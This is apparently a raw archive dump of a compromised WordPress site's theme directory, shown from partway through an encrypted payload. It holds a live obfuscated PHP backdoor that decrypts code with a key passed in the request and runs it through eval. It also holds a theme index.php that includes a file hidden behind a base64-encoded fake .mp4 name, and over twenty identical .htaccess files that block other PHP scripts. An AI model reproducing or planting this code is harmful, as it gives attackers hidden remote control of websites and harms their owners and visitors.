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'; function BNJsQ($TAHn) { $rhgS = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $SQpi = substr($rhgS, 0, 16); $iEM = base64_decode($TAHn); return openssl_decrypt($iEM, "AES-256-CBC", $rhgS, OPENSSL_RAW_DATA, $SQpi); } if (BNJsQ('DjtPn+r4S0yvLCnquPz1fA')){ echo 'SdPxNt/9SRU0CEJBK3zmDV+lRKKSHEO7OzysfWyGelOV+SR0n8tPSSZTbpoKedf3'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($BNJsQ)))); ?>themes/hitmag/hitmag/index.php000066600000000070151142515100012367 0ustar00<?php include_once base64_decode("dVByVnlFS2MubXA0"); ?>themes/hitmag/.htaccess000066600000000424151142515100011077 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/spacious/.htaccess000066600000000424151142515100011454 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/vt-blogging/.htaccess000066600000000424151142515100012045 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/poseidon/.htaccess000066600000000424151142515100011446 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/kale/.htaccess000066600000000424151142515100010542 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/actions/.htaccess000066600000000424151142515100011266 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/.htaccess000066600000000424151142515100007626 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/maxstore/.htaccess000066600000000424151142515100011470 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/renden/.htaccess000066600000000424151142515100011101 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/vantage/.htaccess000066600000000424151142515100011253 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/total/.htaccess000066600000000424151142515100010751 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/envy-blog/.htaccess000066600000000424151142515100011530 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/avant/.htaccess000066600000000424151142515100010737 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/oceanwp/.htaccess000066600000000424151142515100011262 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/astra/.htaccess000066600000000424151142515100010740 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/shapely/.htaccess000066600000000424151142515100011273 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/experon/.htaccess000066600000000424151142515100011306 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/envo-business/.htaccess000066600000000424151142515100012426 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/virtue/.htaccess000066600000000424151142515100011144 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/lodestar/.htaccess000066600000000424151142515100011443 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/online-shop/.htaccess000066600000000424151142515100012061 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>